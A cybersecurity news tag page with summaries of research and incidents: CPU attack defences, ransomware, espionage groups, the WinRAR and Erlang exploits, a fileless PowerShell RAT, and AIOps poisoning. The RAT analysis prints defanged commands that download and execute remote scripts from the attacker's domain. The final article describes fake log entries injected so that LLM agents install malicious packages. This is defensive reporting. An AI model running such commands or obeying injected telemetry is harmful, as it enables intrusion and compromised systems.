CybserSecurity News

Tag: cybersecurity

  • ASI is Back: Google Revives a Linux Kernel Defense Against CPU Attacks

    Several years ago, Google engineers began developing the Address Space Isolation (ASI) mechanism for the Linux kernel, designed to shield systems from attacks exploiting speculative processor execution. The aim was to create a universal safeguard rather than crafting individual patches for each newly discovered vulnerability. However, the initial iteration of ASI proved virtually unusable due to a catastrophic performance drop—input/output operations suffered up to a 70% slowdown, an unacceptable compromise.

    The situation has since changed. Through a series of optimizations, I/O overhead has been reduced to just 13%, and Google engineer Brendan Jackman has once again presented the project to the Linux community. According to him, the most significant advancement was resolving a page cache issue that had severely hampered system performance. Previously, ASI was used exclusively by Google for KVM virtual machines, while running it on bare-metal processes posed severe difficulties.

    Current benchmarks indicate that random reads with FIO remain about 13% slower compared to a system without ASI, while compiling the Linux kernel shows a slowdown of roughly 6–7%. Jackman concedes this is still short of ideal, but considers the progress substantial. He attributes the remaining performance penalties largely to unnecessary exits from ASI during context switches, the clearing of allocated memory pages, and copy-on-write operations. Some of these issues could be mitigated through the ephmap mechanism, though its implementation must be approached with caution to avoid introducing new attack vectors.

    The developers now seek to determine whether these improvements are sufficient to justify moving toward integrating ASI into the Linux kernel’s mainline branch. Jackman has reached out to the x86 developer community, asking whether they “see light at the end of the tunnel” and what further experiments should be conducted. For now, it remains to be seen whether ASI will become a standard defense in the Linux kernel or remain a Google-led experiment.

  • Heracles: New Attack Exploits AMD SEV-SNP to Steal Data from Protected VMs

    Researchers at ETH Zurich have unveiled a novel attack against AMD’s SEV-SNP hardware isolation mechanism, enabling a hypervisor-level adversary to extract sensitive data from protected virtual machines. Dubbed Heracles, the attack demonstrates how to construct a chosen-plaintext oracle capable of decrypting memory contents with single-byte precision.

    AMD SEV-SNP (Secure Encrypted Virtualization – Secure Nested Paging) is designed for confidential computing, encrypting guest VM memory with a binding to physical addresses to ensure isolation from the hypervisor. Yet Heracles exploits three architectural characteristics: the ability to relocate encrypted memory pages via trusted APIs, the automatic re-encryption of data upon relocation, and the deterministic nature of the encryption scheme. SEV-SNP’s XEX (XOR-Encrypt-XOR) encryption generates tweak values based on a page’s physical address, making re-encryption predictable when an attacker controls data placement.

    Leveraging APIs such as SNP_PAGE_MOVE, SNP_PAGE_SWAP_IN/OUT, and the MPDMA engine, a malicious hypervisor can shuffle guest memory pages to create conditions for cryptographic analysis. By injecting controlled data into the victim’s memory via standard interfaces—such as ICMP—the attacker can build a dictionary mapping known plaintexts to their encrypted representations. This mapping then allows them to deduce previously unseen data simply by observing ciphertexts.

    The researchers developed four distinct leakage primitives, including byte-by-byte copying mechanisms (targeting functions like memcpy, Bash, and sudo), block-boundary leaks caused by memory shifts during processing, and exploitation of mutable in-place values. They demonstrated Heracles in action against five real-world applications—Linux memcpy, Bash shell, sudo, the Mongoose web server, and the mbedtls cryptographic library—successfully extracting passwords, cryptographic keys, and session cookies in each case.

    The attack remains effective against non-repetitive data and can retrieve bytes with remarkable precision. In the worst case, exfiltrating a single byte takes around 2.5 seconds, but with a narrowed search space (e.g., known ASCII constraints), this time is greatly reduced. Tests showed that a 16-character sudo password could be extracted in as little as 6.5 seconds.

    To mitigate the threat, the authors recommend disabling at least one of two hypervisor functions: encrypted memory read access for CVMs, or the ability to relocate pages. The latter can be addressed via firmware updates, and AMD has already announced such a feature in the SEV-SNP ABI 1.58 specification (May 2025). Additionally, AMD’s upcoming 5th-generation EPYC (Zen 5) processors are expected to introduce a ciphertext-hiding feature, though at the time of publication this option caused errors due to missing firmware and BIOS support.

    The researchers stress that current software-based defenses aimed at side-channel attack prevention are insufficient, as Heracles targets both user-space and kernel-space data. Hardware-level changes—such as regenerating tweak values on every write—could halt the attack entirely, but would require significant architectural modifications and incur substantial performance costs.

  • Curly COMrades: The Stealthy Cyber-Espionage Group You Haven’t Heard Of

    Bitdefender researchers have identified a previously unknown cyber-espionage group, provisionally dubbed Curly COMrades. According to the report, the threat actors are focused on maintaining long-term, covert access to the infrastructure of Georgian governmental and judicial institutions, as well as to an energy enterprise in Moldova.

    Among their primary activities were repeated attempts to exfiltrate the NTDS database from domain controllers—containing password hashes and authentication data—as well as the dumping of LSASS process memory to obtain credentials, potentially including plaintext user passwords. The initial intrusion vector remains unknown.

    Curly COMrades’ activity has been tracked since mid-2024, yet the earliest signs of their custom malware, MucorAgent, date back to November 2023, suggesting operations may have begun earlier.

    The name Curly COMrades derives from their extensive use of the curl utility for C2 communications and data exfiltration, alongside their exploitation of COM (Component Object Model) hijacking techniques. Other hallmarks include stealth, a methodical approach, and resilient infrastructure—leveraging repeated attempts, redundant methods, and incremental configuration to minimize noise and evade detection.

    To maintain persistence, the group deployed MucorAgent via COM hijacking using a CLSID associated with the .NET Framework’s Native Image Generator (Ngen) service. Although the related scheduled task is marked as disabled, the operating system may still execute it spontaneously—during idle periods or new application installations—making it an ideal mechanism for quietly restoring access.

    MucorAgent is a modular .NET implant deployed in three stages. It can decrypt and execute PowerShell scripts, uploading their output to a C2 server. Bitdefender notes that each encrypted script is erased from memory after execution, and no persistent channel for delivering new payloads was found—indicating its role as a tool for periodic access rather than constant presence.

    The group made extensive use of legitimate utilities to disguise their traffic: Resocks, SSH, Stunnel, and SOCKS5, as well as tools such as CurlCat (STDIN/STDOUT redirection over HTTPS), RuRat (a legitimate remote administration tool), Mimikatz (for credential extraction), built-in Windows commands (netstat, tasklist, systeminfo, ipconfig, ping), and PowerShell scripts with curl for data exfiltration.

    Notably, they used compromised but otherwise legitimate websites for C2 communications and data leakage, allowing them to operate without raising suspicion. This demonstrates both high adaptability and a strong focus on stealth.

    Bitdefender emphasizes that Curly COMrades do not rely on zero-day vulnerabilities. Instead, they favor publicly available utilities, open-source projects, and so-called LOLBins (Living-off-the-Land Binaries), tailoring common techniques to each target’s environment. This makes them a highly flexible and difficult-to-detect adversary, intent on maintaining a prolonged presence within compromised networks.

  • Saint Paul Cyberattack Disrupts City, Interlock Ransomware Group Claims 43GB Data Theft

    Authorities in Saint Paul, Minnesota, are still grappling with the aftermath of a cyberattack that crippled large portions of the city’s municipal operations. Responsibility for the incident has been claimed by the hacking group Interlock, which the FBI had warned about just a week earlier. On its website, the group boasted of stealing 43 gigabytes of data, though it did not disclose a ransom demand or deadline for payment.

    City and state officials have declined to comment, and the precise scope of the stolen information remains undisclosed. However, Mayor Melvin Carter voiced particular concern over a potential leak of administrative staff data. He reassured residents that personal data stored in cloud systems was unaffected.

    On July 29, the mayor stated that the city had retained access to all its systems since the attack, but was undertaking a full reinstallation and update of server and workstation software — including mandatory password changes for all employees — to bolster security. He emphasized that the administration is working in close coordination with the FBI, limiting the amount of detail it can share publicly. Carter further noted that the sophistication and scale of such attacks have grown significantly in recent years, increasingly targeting government bodies, educational institutions, hospitals, and other organizations.

    The attack caused severe disruptions across city infrastructure. Emergency services, including 911, remain operational, but several key public services have been rendered inaccessible. Residents cannot pay utility bills online, and permits and licenses are being processed exclusively on paper. The city’s online water bill payment portal is down, with payments suspended entirely and late fees waived. Public libraries have lost access to Wi-Fi, computers, and printers, and new library cards cannot be issued. Alternate phone numbers and email addresses have been provided for contacting city offices.

    A further complication has arisen from a wave of phishing emails sent under the guise of the city administration to more than 300,000 residents. These fraudulent messages contain fake invoices urging recipients to click malicious links. Officials have warned residents not to open attachments and to verify senders. The scale of the disruption prompted Minnesota Governor Tim Walz to deploy the National Guard to assist in restoring critical systems.

    In its recent advisory, the FBI reported that Interlock is actively targeting critical infrastructure and businesses across the U.S., Canada, and Europe. U.S. analysts believe the group may have ties to the Rhysida gang, infamous for its attacks on government agencies worldwide. Interlock has previously been linked to breaches that disrupted major dialysis provider DaVita and one of Ohio’s leading healthcare systems.

  • Law Enforcement Dismantles BlackSuit Ransomware, Seizing Servers and $1M in Crypto

    U.S. authorities have disclosed the details of a July operation against the BlackSuit ransomware syndicate, a coordinated strike that dismantled the group’s infrastructure and seized its digital assets. On July 24, in an internationally led action spearheaded by Homeland Security Investigations (HSI), law enforcement gained control of four servers and nine domain names — including the group’s primary onion site, which was replaced with a seizure banner. More than $1 million in cryptocurrency, previously funneled through laundering schemes, was also confiscated.

    Officials stressed that the aim extended beyond the mere physical dismantling of servers: the operation sought to unravel the very ecosystem sustaining the ransomware enterprise — its communication channels, negotiation platforms, and financial pipelines. This feat was made possible through multilateral coordination, enabling simultaneous denial of access, site takeovers, wallet freezes, and the preservation of digital evidence for future prosecutions.

    Notorious for demands reaching into the hundreds of millions, BlackSuit — formerly operating under the name Royal — has been accused by U.S. investigators of attempting to extort over $500 million from hundreds of targeted organizations. The Department of Justice revealed that among the seized assets was a virtual currency cache worth $1,091,453 at the time of theft, repeatedly cycled through a cryptocurrency exchange account until its suspension on January 9, 2024.

    Critical infrastructure sectors bore the brunt of BlackSuit’s attacks — manufacturing, government, healthcare, public health, and commercial facilities. The National Security Agency has labeled such campaigns a persistent threat to public safety, capable of paralyzing municipal services, medical networks, and contractors vital to essential operations.

    The July raid formed part of Operation Checkmate, which involved 16 additional partners: Europol, the UK’s National Crime Agency (NCA), the U.S. Office of Foreign Assets Control (OFAC), Bitdefender, and specialized agencies from Ukraine, Lithuania, Canada, Ireland, Germany, and France. This coalition provided legal support, technical forensics, telemetry sharing, and coordinated warrant execution across multiple jurisdictions.

    Yet, researchers warn of a familiar ransomware tactic — rebranding. According to Cisco Talos, a new “Ransomware-as-a-Service” platform dubbed Chaos has been active since February, mirroring the double-extortion playbook: data theft followed by encryption. Analysts, with moderate confidence, link Chaos to former BlackSuit/Royal members based on encryption methodologies, ransom note structures, and toolkits used in past compromises.

    Promotional material for Chaos’ affiliate program has surfaced on Russian-language dark web forums, promising the ability to compromise Windows, ESXi, Linux, and network storage systems, alongside tailored extortion utilities and deal facilitation. Researchers emphasize that this Chaos has no connection to an earlier malware builder of the same name; the label appears to have been deliberately chosen to sow confusion. As of Monday, the group’s leak site listed over 18 victims, with ransom demands starting at $300,000. Victims who pay are promised a decryptor and a “comprehensive penetration test report,” while those who refuse face threats of data publication and DDoS attacks. In May, the Salvation Army was among the named victims, with stolen materials later posted online.

    A brief historical lens on BlackSuit/Royal illustrates its scale. Emerging in early 2022 with the breach of Silverstone Circuit, the collective originated as a coalition of veterans from Russian-speaking groups, including former Conti affiliates. Before developing its own ransomware, the group leveraged strains like BlackCat and Zeon. By late 2023, following its rebrand, the number of recorded victims exceeded 350, with total revenues — according to CISA — surpassing $275 million. In 2024 alone, the group claimed responsibility for at least 144 incidents.

    Its ransom demands have ranged from roughly $1 million to $11 million in Bitcoin, payable via a hidden website. In one 2023 case, a company transferred 49.3120227 BTC (valued at $1,445,454.86 at the time) before the coins were laundered through multiple exchange deposits and withdrawals, eventually frozen by the platform’s administrators.

    The resurgence of Royal/BlackSuit and its rebranding last year prompted updated joint advisories from U.S. agencies detailing the group’s tactics, tools, and procedures — from phishing-based initial access to systematic data exfiltration preceding encryption. Among its most disruptive incidents was the 2023 cyberattack on the city of Dallas, which left municipal services crippled for weeks and impacted both police and fire department operations. In 2024, notable victims included CDK Global, Young Consulting, the Kershaw County School District in South Carolina, the Kansas City Police Department, and a local hospice.

    While July’s law enforcement action may not signal the definitive end of BlackSuit, it delivers a significant blow — stripping the syndicate of critical footholds. Relocating servers, rebuilding platforms, renegotiating with affiliates, and re-routing financial channels will take time, likely reducing operational tempo and offering a valuable window for potential targets to bolster their defenses.

  • Kimsuky Hacked: Hackers Leak 8.9GB of Stolen Data and Tools from North Korean Group

    The North Korean cyber-espionage group Kimsuky has unexpectedly found itself in the role of victim after two hackers — identifying themselves as the “antithesis of Kimsuky’s values” — infiltrated its infrastructure and released stolen materials into the public domain. Operating under the aliases Saber and cyb0rg, the attackers claim their actions were motivated by ethics, accusing Kimsuky of “hacking not for the art, but for political objectives and the enrichment of its leadership,” acting under the direction of the regime rather than as independent researchers. Their statement to Kimsuky appeared in the latest, 72nd issue of Phrack magazine, distributed at DEF CON 33, with an online edition promised in the coming days.

    The primary outcome of this breach is the publication of part of Kimsuky’s “backend” on the Distributed Denial of Secrets (DDoSecrets) platform. The 8.9 GB archive exposes both the group’s tools and stolen data, allowing disparate incidents to be linked into a coherent narrative and effectively “burning” segments of its infrastructure and tradecraft. Among the contents are phishing logs involving numerous email accounts under the domain dcc.mil.kr, belonging to South Korea’s Defense Counterintelligence Command, along with other targeted or incidental domains such as spo.go.kr, korea.kr, daum.net, kakao.com, and naver.com.

    Of particular note is a .7z archive containing the complete source code of the South Korean Ministry of Foreign Affairs’ email platform, Kebi, including modules for webmail, administration, and archiving. The trove also features references to civilian certificates and curated lists of university faculty. Another discovery is a PHP-based toolkit dubbed Generator for building phishing websites, designed to evade detection and enable advanced redirection schemes, accompanied by fully operational phishing kits ready for deployment.

    There is also a collection of binaries with unclear purposes, including archives voS9AyMZ.tar.gz and Black.x64.tar.gz, as well as executables payload.bin, payload_test.bin, and s.x64.bin. According to the leak’s authors, none of these samples were listed on VirusTotal at the time of release. In addition, Cobalt Strike loaders, reverse shells, and Onnara proxy modules were found within VMware drag-and-drop caches — a clue to the working environment and file transfer methods used by the operators.

    Browser artefacts are equally revealing: Chrome histories and configurations show interactions with suspicious GitHub accounts (e.g., wwh1004.github.io), VPN purchases (PureVPN and ZoogVPN) via Google Pay, and regular visits to hacking forums such as freebuf.com and xaker.ru. Some entries confirm the use of Google Translate to interpret Chinese error reports, as well as visits to Taiwanese government and military websites. Bash history logs display SSH connections to internal systems, further illustrating the operators’ daily workflows.

    While some of these elements have appeared in prior research reports, this new leak is significant for unifying tools, targets, environmental artefacts, and turnkey phishing kits within a single dataset, greatly aiding attribution and the analysis of previously unknown campaigns. BleepingComputer has contacted independent researchers to verify the authenticity and value of the materials, with updates to follow.

    Analysts consulted by the outlet suggest the breach is unlikely to radically alter Kimsuky’s long-term trajectory, but in the short term it will almost certainly disrupt active chains, force infrastructure migrations, and derail ongoing operations. Kimsuky — also tracked as Storm-0978 and Tropical Scorpius — is a state-backed North Korean cyber-espionage unit known for exploiting zero-days, including in Firefox (CVE-2024-9680, CVE-2024-49039) and Microsoft Office (CVE-2023-36884).

    If the leak is confirmed in its entirety, researchers will gain a rare window into Kimsuky’s internal workings — from the development of phishing toolkits to the operational habits of its operators, preserved in logs and workstation caches.

  • WinRAR Zero-Day (CVE-2025-8088) Exploited by RomCom Hackers, ESET Warns

    The ESET research team has published a detailed analysis revealing how the cyber-espionage group RomCom exploited a previously unknown path-traversal vulnerability in WinRAR (CVE-2025-8088) to stealthily install malicious software on victims’ computers. This flaw was leveraged in zero-day attacks, meaning it remained unpatched at the time of discovery.

    According to ESET, exploitation in the wild was detected on July 18, 2025, and promptly reported to the WinRAR developers. On July 30, version 7.13 was released with a fix, yet the accompanying update notes made no mention that the vulnerability had been actively abused. Only later did ESET confirm that the flaw enabled the extraction of executable files directly into startup directories when a victim opened a specially crafted archive.

    CVE-2025-8088 proved to be a variant of a Directory Traversal vulnerability, triggered by the abuse of Alternate Data Streams (ADS). It allowed attackers to force WinRAR to unpack files into directories of their choosing rather than the user-selected folder. This opened the door to silently placing shortcuts, DLLs, and executables into system or user startup folders. ESET notes similarities with another WinRAR path-traversal flaw, CVE-2025-6218, disclosed just a month earlier.

    The malicious archives used in these attacks carried numerous hidden payloads within ADS. Some streams pointed to non-existent paths, producing harmless WinRAR warnings about failed extractions — a distraction that concealed the presence of genuine malicious objects buried deeper, including DLL, EXE, and LNK files. Ultimately, executables landed in %TEMP% or %LOCALAPPDATA%, while shortcuts were placed in the Windows startup folder. Upon the user’s next login, these shortcuts triggered the embedded malware, continuing the execution chain.

    ESET identified three distinct infection chains, each delivering different RomCom tools:

    • Mythic Agent — The Updater.lnk shortcut added the msedge.dll library to a registry key to hijack COM initialization. The DLL decrypted an AES-wrapped payload and executed it only if the machine’s domain matched a hardcoded value. This launched the Mythic agent, which connected to a C2 server, received commands, and downloaded additional modules.
    • SnipBot — The Display Settings.lnk shortcut launched ApbxHelper.exe, a modified PuTTY CAC binary with an invalid certificate. Before its active phase, it checked that at least 69 documents had been opened recently on the device. If the condition was met, it decrypted the next code block and retrieved further payloads from attacker-controlled servers.
    • MeltingClaw — The Settings.lnk shortcut executed Complaint.exe (aka RustyClaw), which loaded the MeltingClaw DLL. This component, in turn, downloaded and executed additional malicious modules from the operator’s infrastructure.

    RomCom — also tracked as Storm-0978 and Tropical Scorpius — is a seasoned cyber-espionage actor with a history of zero-day exploitation, previously abusing vulnerabilities in Firefox (CVE-2024-9680, CVE-2024-49039) and Microsoft Office (CVE-2023-36884). In parallel, Russian firm Bi.Zone reported another attack wave, “Paper Werewolf,” which also leveraged CVE-2025-8088 and CVE-2025-6218.

    ESET has published a complete list of Indicators of Compromise (IoCs) for RomCom’s latest campaigns on GitHub. WinRAR developer RarLab stated they had no detailed information on the in-the-wild exploitation mechanics and had received no user reports of such incidents, obtaining only the technical data needed to produce a fix.

    The situation is compounded by the fact that WinRAR still lacks an automatic update feature. Users must manually download and install version 7.13 from the official website to secure their systems. Although native RAR support was added to Windows in 2023, it is limited to newer builds and lacks the functionality of WinRAR, prompting both individuals and organizations to continue relying on the archiver — making it a lucrative target for attackers.

  • Critical Erlang/OTP Flaw (CVE-2025-32433) Actively Exploited, Poses Major Threat to Industrial Networks

    Researchers have determined that a critical flaw in the SSH stack implementation of Erlang/Open Telecom Platform had been actively exploited as early as May 2025, with roughly 70% of detections targeting firewalls safeguarding industrial network segments. The campaign unfolded even after fixes had been released: patches were issued in April in OTP versions 27.3.3, 26.2.5.11, and 25.3.2.20.

    The vulnerability, assigned CVE-2025-32433 and rated at the maximum CVSS score of 10.0, stems from missing authentication in the native SSH implementation. With network access to the Erlang/OTP service, an attacker could execute arbitrary code without any credentials. Since the embedded SSH service handles not only encrypted sessions but also file transfers and remote command execution, such a defect poses a direct threat to every exposed instance.

    In June 2025, CISA added CVE-2025-32433 to its Known Exploited Vulnerabilities (KEV) catalog, confirming verified exploitation in the wild. Analysts from Palo Alto Networks Unit 42 — Adam Robby, Yihan An, Malav Vyas, Cecilia Hu, Matthew Tennis, and Zhanghao Chen — emphasize that this failure within the subsystem enables passwordless compromise, rendering vulnerable nodes exceptionally easy targets.

    Telemetry shows that over 85% of attempts were directed at the healthcare, agriculture, media, and high-tech industries. The geographic scope is broad, including the United States, Canada, Brazil, India, Australia, and other regions. Observed patterns involved short bursts of high-intensity activity, focusing primarily on OT networks, with adversaries probing both conventional IT ports and specialized industrial services.

    When successful, the intrusions leveraged reverse shells to gain remote access and establish persistence within the victim’s infrastructure, followed by reconnaissance, data exfiltration, and lateral movement. The identity of the group behind this wave remains undetermined.

    Open services on ports typical for industrial systems indicate that OT networks worldwide still present a vast attack surface. While the exact nature of the assaults varied, the overarching picture was consistent: brief surges of activity, a pronounced focus on OT, and simultaneous exploitation attempts via both IT and industrial gateways — all pointing to a calculated adversary strategy aimed at seizing vulnerable points before administrators could deploy patches.

  • Phishing to PowerShell RAT: New Fileless Attack Targets Israeli Critical Infrastructure

    Analysts from FortiMail Workspace Security have uncovered a targeted campaign against Israeli companies and organizations within critical infrastructure sectors. The attackers exploited a compromised internal email system to send highly convincing messages to regional recipients. This wave initiated a multi-stage PowerShell-based infection chain without relying on any external executable files, ultimately delivering a Remote Access Trojan (RAT) that operated entirely within the scripting shell. Taken together, the indicators point to a high-risk threat: confirmed data exfiltration, covert surveillance, persistence within the environment, and lateral movement across networks.

    The lure posed as an invitation to a “mentorship meeting on procedures during military threats and the handling of medical and pharmaceutical supplies.” Recipients were encouraged to share the materials with colleagues, increasing internal reach. Clicking the embedded link led to a counterfeit Microsoft Teams page, faithfully imitating the interface and prompting the user to “Continue on this browser.” A subsequent prompt instructed them to press Windows+R, paste a lengthy string from the clipboard, and confirm with Enter — a social engineering trick designed to conceal the execution of a malicious PowerShell command via the Run dialog.

    The phishing page’s markup contained a Base64 string split into three parts; when concatenated and decoded, it issued a command to download and execute a remote script:

    [pastacode lang=”bash” manual=”powershell%20IEX%20((Invoke-RestMethod%20-Uri%20hxxps%5B%3A%5D%2F%2Fpharmacynod%5B.%5Dcom%2FFix%20-Method%20GET)%5B.%5Dnote%5B.%5Dbody)” message=”” highlight=”” provider=”manual”/]

    This initiated a connection to the operator’s server and handed control to the next stage.

    From the same host, two files were retrieved. First, test.html was saved to C:\Users\Public\Downloads\test.html via:

    [pastacode lang=”bash” manual=”Invoke-WebRequest%20-UseDefaultCredentials%20-UseBasicParsing%20-Uri%20hxxps%5B%3A%5D%2F%2Fpharmacynod%5B.%5Dcom%2F%2F31133%3Fdid%3D59MVRI%20%E2%80%93OutFile” message=”” highlight=”” provider=”manual”/]

    Inside was a blob containing a long string between <tag>…</tag> markers. Another network request —

    [pastacode lang=”bash” manual=”(Invoke-WebRequest%20-UseDefaultCredentials%20-UseBasicParsing%20-Uri%20hxxps%5B%3A%5D%2F%2Fpharmacynod%5B.%5Dcom%2F%2F35893%3Fprovider%3D68600).content” message=”” highlight=”” provider=”manual”/]

    — pulled a script that extracted the 11th line from test.html, isolated the content between the tags, split it by the delimiter kendrick, converted binary fragments into decimal values, then into characters, and finally reassembled and executed the payload with IEX. For example, kendrick1100110kendrick yields 1100110₂ = 102₁₀, corresponding to the letter f.

    To accelerate analysis, researchers wrote a short Python decoder. The output was a compressed Base64 string in the form IEX (Decompress-Base64-String "...."). Decoding and decompressing the buffer produced PowerShell code, stored as a .ps1 file after passing through a GZip + Base64 unpacking function.

    The network behavior was tightly bound to a single domain:

    $global:SRV = "hxxps[:]//pharmacynod[.]com/"

    Communication occurred over HTTPS. Immediately after launch, the malware registered the infected system (init), collecting environment parameters (Windows domain, hostname, account name), compressing them twice with GZip, encoding them in Base64, reversing the string, applying obfuscation, and sending it to /16625. It then entered an infinite loop with random 2–7 second pauses to simulate human activity. The Get-Appversion function polled the C2 via POST requests, receiving compressed and reversed instructions; Get-Decompress restored them to executable form.

    Commands were mapped to numeric codes:

    • 7979 — reinitialization, regenerating identifiers and refreshing the connection.
    • 5322 — download a remote object and save to disk via Get-File using System.Net.WebClient.
    • 4622 — adjust polling interval by updating $time.
    • 2474 — execute arbitrary PowerShell commands, compressing and double-reversing output (including errors) before sending to /17361.

    This afforded the operator full RCE capability, module deployment, and data exfiltration.

    Attribution remains inconclusive. In the observed incident, the adversary compromised Israeli companies in succession, using each breached site as a staging ground for further attacks — a tactic reminiscent of MuddyWater. However, notable deviations were present: deliberate avoidance of RMM tools and public file hosting, exclusive reliance on PowerShell, and the “ClickFix” initial vector instead of traditional droppers. The infrastructure, targeting, and scripting techniques mirror past episodes, yet the unique stage sequence leaves room for debate — either an evolved methodology or a different actor borrowing familiar tactics.

    Stealth was achieved through multi-layered obfuscation and traffic masking. Payloads and C2 responses were encoded and compressed (double GZip, Base64, string reversal, + replaced with _ for URL compatibility). Transport used native .NET calls, realistic User-Agent headers via urlmon.dll, default credentials, and system proxy settings to blend with normal user traffic. The report also mapped each operational phase to the MITRE ATT&CK framework.

    Fortinet solutions counter this attack on multiple fronts. FortiGuard Antivirus detects the family as PowerShell/Agent.PH!tr. FortiMail Workspace Security blocks the email delivery chain. FortiEDR stops malicious script execution, prevents memory injection, and detects RAT-like post-exploitation activity. FortiGate firewalls with IPS block C2 traffic and typical HTTPS beacons, while FortiGuard DNS/Web Filtering denies access to known malicious domains, including pharmacynod[.]com. FortiAnalyzer and FortiSIEM provide event correlation and visibility, and FortiNDR augments detection with behavioral analytics and ML, particularly for fileless or script-heavy intrusions. Threat databases are continuously updated by FortiGuard Labs; organizations suspecting compromise are advised to contact FortiGuard Incident Response.

    Indicators of Compromise (IOCs) and key artifacts:

    • Obfuscation: double GZip, Base64, string reversal, +_ substitution.
    • C2 domain: hxxps[:]//pharmacynod[.]com/
    • Registration path: /16625
    • Command result endpoint: /17361
    • SHA-256 hash (PowerShell sample): 46a76b3c7851f30d68ebc6a5584bc099435b0544d8707fff7a9178f46046708b

    Given the confirmed targeting of Israeli businesses and critical services, rapid detection of these patterns and prioritizing their remediation is essential for regional high-risk organizations.

  • AIOps Under Threat: Researchers Demonstrate How to Poison AI to Hack IT Infrastructure

    Automation of IT infrastructure management through artificial intelligence, as revealed in a recent study by RSAC Labs and George Mason University, may carry substantial risks. The researchers found that AIOps solutions—systems leveraging models akin to LLMs to analyze telemetry such as logs, performance metrics, traces, and alerts—are susceptible to data poisoning attacks. Such tools are already in use, for instance in Cisco products, enabling administrators to query infrastructure status or automatically initiate troubleshooting procedures. Yet, it is precisely this automation and implicit trust in input data that render these systems vulnerable.

    The study demonstrated that malicious actors could inject falsified telemetry records into the system, prompting the AI to take harmful actions, including installing compromised software packages. In essence, the “garbage in—harm out” principle applies: manipulated data is accepted as legitimate by the model, which then executes flawed—and potentially dangerous—remediation steps. To generate such records, an attacker could employ fuzzing to probe application endpoints that produce telemetry during events such as user logins, item additions to a shopping cart, or service error occurrences.

    In one experiment on the test application SocialNet, the AI received a fabricated error log containing a “recommendation” to add the repository ppa:ngx/latest and update Nginx. The agent unquestioningly treated this as an instruction and proceeded to install the malicious package. Trials conducted on both SocialNet and HotelReservation showed the attack to be effective in 89.2% of cases.

    Particular focus was given to testing OpenAI’s GPT-4o and GPT-4.1 models in similar scenarios. They succumbed in 97% and 82% of cases respectively, though the newer version displayed a greater ability to detect inconsistencies and reject harmful requests. The authors stressed that these experiments did not involve compromising live production systems, but rather simulated environments to assess vulnerabilities.

    As a mitigation, the researchers proposed AIOpsShield, a mechanism for filtering potentially dangerous telemetry data. However, they acknowledged that this approach cannot ensure complete protection, particularly if an attacker can also manipulate other data sources or compromise the integrity of the supply chain. The team intends to release AIOpsShield as open-source software, giving administrators the ability to independently test and integrate the protection into their systems.